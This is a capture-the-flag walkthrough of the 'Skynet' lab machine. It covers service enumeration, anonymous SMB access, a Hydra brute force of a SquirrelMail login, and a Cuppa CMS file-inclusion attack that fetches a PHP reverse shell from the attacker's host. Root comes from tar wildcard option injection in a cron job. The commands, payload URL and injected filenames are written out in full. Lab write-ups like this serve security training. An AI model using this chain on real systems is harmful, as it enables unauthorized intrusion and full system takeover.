SKYNET.




SCANNING: SERVICES:
[Quick nmap scan:]
nmap -sS -T4 -sV 10.10.230.195
[OUTPUT:]
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel





EXPLORING: http://10.10.230.195/:
[Note:]
Landing site displays searchbar and three seemingly useless buttons.
Searchbar doesn't return anything.




SCANNING: DIRECTORIES:
[Quick gobuster scan:]
gobuster dir -u http://10.10.230.195 -w /usr/share/seclists/Discovery/Web-Content/common.txt
[OUTPUT:]
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/admin                (Status: 301) [Size: 314] [--> http://10.10.230.195/admin/]
/config               (Status: 301) [Size: 315] [--> http://10.10.230.195/config/]
/css                  (Status: 301) [Size: 312] [--> http://10.10.230.195/css/]
/index.html           (Status: 200) [Size: 523]
/js                   (Status: 301) [Size: 311] [--> http://10.10.230.195/js/]
/server-status        (Status: 403) [Size: 278]
/squirrelmail         (Status: 301) [Size: 321] [--> http://10.10.230.195/squirrelmail/]


[Directory exploration:]
Forbidden access in:
1. http://10.10.230.195/admin/
2. http://10.10.230.195/config/
3. http://10.10.230.195/css/
4. http://10.10.230.195/js/


We can access http://10.10.230.195/squirrelmail/src/login.php.
OUTPUT:
SquirrelMail version 1.4.23 [SVN]
By the SquirrelMail Project Team
SquirrelMail Login
Name:	
Password:	




EXPLORING: http://10.10.230.195/squirrelmail/src/redirect.php
[We try common passwords for admin:]
admin, password, qwerty.
[OUTPUT:]
ERROR
Unknown user or password incorrect.
[Note:]
We are probably missing some clue.
We will explore other services now.




EXPLORE: POP3:
[Connect to server:]
telnet 10.10.230.195 110
[OUTPUT:]
Trying 10.10.230.195...
Connected to 10.10.230.195.
Escape character is '^]'.
+OK Dovecot ready.


[Attempt anon credential login:]
USER anonymous
[OUTPUT:]
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.


[End session:]
QUIT




EXPLORE: SMB ON PORT 139:	:
[List shares:]
smbclient -L 10.10.230.195 -p 139 -N
[OUTPUT:]
Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            SKYNET


[Connect anon share:]
smbclient //10.10.230.195/anonymous -p 139 -N
[OUTPUT:]
Try "help" to get a list of possible commands.
smb: \> 
[Note:]
We had succesful login.



[List directory:]
ls
[OUTPUT:]
  .                                   D        0  Thu Nov 26 17:04:00 2020
  ..                                  D        0  Tue Sep 17 09:20:17 2019
  attention.txt                       N      163  Wed Sep 18 05:04:59 2019
  logs                                D        0  Wed Sep 18 06:42:16 2019


[Disable prompting:]
prompt
[Note:]
This is done so we don't need to confirm each file download.


[Download all files:]
mget *
[OUTPUT:]
getting file \attention.txt of size 163 as attention.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)


[End session:]
exit


[Read attention.txt:]
cat attention.txt
[OUTPUT:]
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson


[Attempt to connect to milesdyson share:]
smbclient //10.10.230.195/print$ -p 139 -N
[OUTPUT:]
tree connect failed: NT_STATUS_ACCESS_DENIED


[Attempt to connect to print$ share:]
smbclient //10.10.230.195/print$ -p 139 -N
[OUTPUT:]
tree connect failed: NT_STATUS_ACCESS_DENIED


[Attempt to connect to ipc$ share:]
smbclient //10.10.230.195/ipc$ -p 139 -N
[OUTPUT:]
smb: \> 


[List ipc$ files:]
ls
[OUTPUT:]
[Note:]




EXPLORE: SMB ON PORT 445:
[List shares:]
smbclient -L 10.10.230.195 -p 445 -N
[OUTPUT:]
Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            SKYNET


[Connect anon share:]
smbclient //10.10.230.195/anonymous -p 445 -N
[OUTPUT:]
Try "help" to get a list of possible commands.
smb: \> 
[Note:]
We had succesful login.


[List directory:]
ls
[OUTPUT:]
  .                                   D        0  Thu Nov 26 17:04:00 2020
  ..                                  D        0  Tue Sep 17 09:20:17 2019
  attention.txt                       N      163  Wed Sep 18 05:04:59 2019
  logs                                D        0  Wed Sep 18 06:42:16 2019
[Note:]
Looks like both ports serve the same smb service.




EXPLORE: IMAP:
[Connect to server:]
telnet 10.10.230.195 143
[OUTPUT:]
Trying 10.10.230.195...
Connected to 10.10.230.195.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot ready.
[Note:]
LOGINDISABLED means we can't login via standard LOGIN command.



[Note:]
We have a user (milesdyson) and a squirrel login portal.
We also have no other clues as to what to do next.
So we will try to bruteforce the login for said user.
BRUTEFORCE: MILESYSON'S SQUIRRELMAIL:
[Note:]
First, we need to find how the login redirects, and the real form names for Name and Password fields.
[Form values:]
name -> login_username
password -> secretkey
There are 2 other form data values:
1. js_autodetect_results
2.just_logged_in


[Backend url and status code:]
It looks like status code 200 is always returned.
Also, request url is: http://10.10.230.195/squirrelmail/src/redirect.php, which shows the wrong user or password message.


[Response (OUTPUT):]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="x-dns-prefetch-control" content="off">
<script type="text/javascript" language="JavaScript">
<!--
if (self != top) { try { if (document.domain != top.document.domain) { throw "Clickjacking security violation! Please log out immediately!"; /* this code should never execute - exception should already have been thrown since it's a security violation in this case to even try to access top.document.domain (but it's left here just to be extra safe) */ } } catch (e) { self.location = "/squirrelmail/src/signout.php"; top.location = "/squirrelmail/src/signout.php" } }
// -->
</script>

<title>SquirrelMail - Unknown user or password incorrect.</title>
<!--[if IE 6]>
<style type="text/css">
/* avoid stupid IE6 bug with frames and scrollbars */
body {
    width: expression(document.documentElement.clientWidth - 30);
}
</style>
<![endif]-->

</head>

<body text="#000000" bgcolor="#ffffff" link="#0000cc" vlink="#0000cc" alink="#0000cc">

<center><img src="../images/sm_logo.png" alt="SquirrelMail Logo" width="308" height="111" /><br />
<small>SquirrelMail version 1.4.23 [SVN]<br />By the SquirrelMail Project Team<br /></small>
<table cellspacing="1" cellpadding="0" bgcolor="#800000" width="70%"><tr><td><table width="100%" border="0" bgcolor="#ffffff" align="center"><tr><td bgcolor="#dcdcdc" align="center"><font color="#cc0000"><b>ERROR</b></font></td></tr><tr><td align="center">Unknown user or password incorrect.</td></tr><tr><td bgcolor="#dcdcdc" align="center"><font color="#cc0000"><b><a href="/squirrelmail/src/login.php" target="_top">Go to the login page</a></b></font></td></tr></table></td></tr></table></center></body></html>





[Note:]
The parameters required to bruteforce the squirrel mail seem to difficult for the room, also, I noticed a mistake I did when downloading the SMB files.
Command mget * only downloads files from current directory, so we didn't get the logs.



SMB: LOG DIRECTORY DOWNLOAD:
[Command recap:]
smbclient //10.10.230.195/anonymous -p 445 -N
ls


[Grab logs:]
cd logs
prompt
mget *
exit

[Check log1.txt:]
cat log1.txt
[Note:]
Output is what looks like a password list.


[Check log2.txt:]
cat log2.txt
[Note:]
Empty file.
Same happens with log3.txt





[Note:]
We got a passwordlist, so it looks like our plan to bruteforce said user's login was on the right path.
BRUTEFORCE: MYLES DYSON'S SQUIRREL EMAIL:
[Hydra command:]
hydra -l milesdyson -P log1.txt 10.10.230.195 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
[OUTPUT:]
[80][http-post-form] host: 10.10.230.195   login: milesdyson   password: cyborg007haloterminator




EXPLORE: MILESDYSON SQUIRREL MAIL:
[Login:]
Use creds milesdyson|cyborg007haloterminator in http://10.10.230.195/squirrelmail/src/login.php.
OUTPUT:
3 mails in inbox (no drafts, sent or trash).


[Email 1. OUTPUT:]
Samba password reset.
OUTPUT:
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`


[Email 2. OUTPUT:]
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
[Note:]
Looks like binary. Deciphered string: balls have zero to me to me to me to me to me to me to me to me to.
Just a joke based on the context of terminator robts talking to eachother.
Email 3 does the same thing.




[SAMBA: MILESDYSON:]
[Note:]
Found password: )s{A&2Z=F^n_E.B`
[Log in to his share under his username:]
smbclient  //10.10.230.195/milesdyson -U milesdyson


[List directory content:]
ls
[OUTPUT:]
  .                                   D        0  Tue Sep 17 11:05:47 2019
  ..                                  D        0  Wed Sep 18 05:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 11:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 11:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 11:05:14 2019
  notes                               D        0  Tue Sep 17 11:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 11:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 11:05:14 2019


[Note:]
Only interesting output is the notes folder. We won't make the same mistake with mget as before.
[Move and list content:]
cd 
ls
[OUTPUT:]
 .                                   D        0  Tue Sep 17 11:05:47 2019
  ..                                  D        0  Wed Sep 18 05:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 11:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 11:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 11:05:14 2019
  notes                               D        0  Tue Sep 17 11:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 11:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 11:05:14 2019

		9204224 blocks of size 1024. 5830580 blocks available
smb: \> cd notes
smb: \notes\> ls
  .                                   D        0  Tue Sep 17 11:18:40 2019
  ..                                  D        0  Tue Sep 17 11:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 11:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 11:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 11:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 11:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 11:01:29 2019
  important.txt                       N      117  Tue Sep 17 11:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 11:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 11:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 11:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 11:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 11:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 11:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 11:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 11:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 11:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 11:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 11:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 11:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 11:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 11:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 11:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 11:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 11:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 11:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 11:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 11:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 11:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 11:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 11:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 11:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 11:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 11:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 11:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 11:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 11:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 11:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 11:01:29 2019

		9204224 blocks of size 1024. 5830580 blocks available
smb: \notes\> dir
  .                                   D        0  Tue Sep 17 11:18:40 2019
  ..                                  D        0  Tue Sep 17 11:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 11:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 11:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 11:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 11:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 11:01:29 2019
  important.txt                       N      117  Tue Sep 17 11:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 11:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 11:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 11:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 11:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 11:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 11:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 11:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 11:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 11:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 11:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 11:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 11:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 11:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 11:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 11:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 11:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 11:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 11:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 11:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 11:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 11:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 11:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 11:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 11:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 11:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 11:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 11:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 11:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 11:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 11:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 11:01:29 2019


[Download important.txt:]
mget important.txt
y


[Read important.txt:]
cat important.txt
[OUTPUT:]
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
[Note:]
We found a hidden directory.
It works directly from the ip: http://10.10.230.195/45kra24zxs28v3yd/



EXPLORE: HIDDEN BETA CMS (http://10.10.230.195/45kra24zxs28v3yd/):
[Note:]
Quick source read reveals nothing.	
And there are no links or buttons that redirect to subdirectories.
We need to do enumeration.



ENUMERATION: HIDDEN CMS:
[Quick gobuster scan:]
gobuster dir -u http://10.10.230.195/45kra24zxs28v3yd -w /usr/share/seclists/Discovery/Web-Content/common.txt
[OUTPUT:]
/.htaccess            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/administrator        (Status: 301) [Size: 339] [--> http://10.10.230.195/45kra24zxs28v3yd/administrator/]
/index.html           (Status: 200) [Size: 418]




EXPLORING: http://10.10.230.195/45kra24zxs28v3yd/administrator/:
[Login testing:]
1. admin | admin: no
2. milesdyson | )s{A&2Z=F^n_E.B`: no
3. miles | )s{A&2Z=F^n_E.B`: no




[Note:]
Out of ideas, we research exploits to get past the admin portal.
EXPLOIT: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion (https://www.exploit-db.com/exploits/25971):
[Note:]
We need to be admin before we can run the exploit.
Which seems impossible to us right now.
We will look for exploits on metasploit.




EXPLOIT: VIA METASPLOIT:
[Run metasploit:]
msfconsole


[Look for cappa cms related exploits:]
search cuppa
[OUTPUT:]
[-] No results from search


[Search in exploitdb:]
searchsploit cuppa
[OUTPUT:]
Cuppa CMS - '/alertConfigField.php' L | php/webapps/25971.txt


[Copy preinstalled shell:]
cp /usr/share/webshells/php/php-reverse-shell.php .
[Note:]
We also set relevant variables to 10.23.25.109 and 4444.


[Start python server:]
python3 -m http.server 8080


[Start listener:]
nc -lnvp 4444


[Run exploit:]
Visit: http://10.10.230.195/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.23.25.109:8080/php-reverse-shell.php
[OUTPUT:]
$


[Stabilize shell:]
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo; fg
export TERM=xterm




USER FLAG:
[Find user flag:]
find / -name "user.txt" 2>/dev/null
[OUTPUT:]
/home/milesdyson/user.txt


[Read the flag:]
cat /home/milesdyson/user.txt
[OUTPUT:]
7ce5c2109a40f958099283600a9ae807




PRIVESC:
[Note:]
We will start by running linpeas.
[Start python server:]
python3 -m http.server 8000


[Download linpeas:]
curl http://10.23.25.109:8000/linpeas.sh -o /tmp/linpeas.sh


[Execute linpeas:]
cd tmp
chmod +x linpeas.sh
sh linpeas.sh | tee linpeas_output.txt


[Suid check:]
find / -perm -4000 -type f 2>/dev/null
[OUTPUT:]
/sbin/mount.cifs
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
/bin/ping6
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign


[Linpeas. OUTPUT:]
Crontab ran as root:
/home/milesdyson/backups/backup.sh


[Check if backup.sh editable:]
cd /home/milesdyson/backups/
ls -la
[OUTPUT:]
drwxr-xr-x 2 root       root          4096 Sep 17  2019 .
drwxr-xr-x 5 milesdyson milesdyson    4096 Sep 17  2019 ..
-rwxr-xr-x 1 root       root            74 Sep 17  2019 backup.sh
-rw-r--r-- 1 root       root       4679680 Jul 22 13:56 backup.tgz


[Check content of script:]
cat milesdyson.sh
[OUTPUT:]
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
[Note:]
Wilcard (*) in tar can be exploited.


[Create scripts that sets suid to bash:]
echo -e '#!/bin/bash\nchmod +s /bin/bash' > /var/www/html/root_shell.sh


[Create files, that cronjob will interpet as options:]
touch "/var/www/html/--checkpoint-action=exec=sh root_shell.sh"
touch "/var/www/html/--checkpoint=1"


[Bash permissions after injection:]
ls -l /bin/bash
[OUTPUT:]
-rwsr-sr-x 1 root root 1037528 Jul 12  2019 /bin/bash


[Spawn root shell:]
/bin/bash -p
[OUTPUT:]
bash-4.3#




ROOT FLAG:	
[Check root flag:]
cat /root/root.txt
[OUTPUT:]
3f0372db24753accc7179a282cd6a949
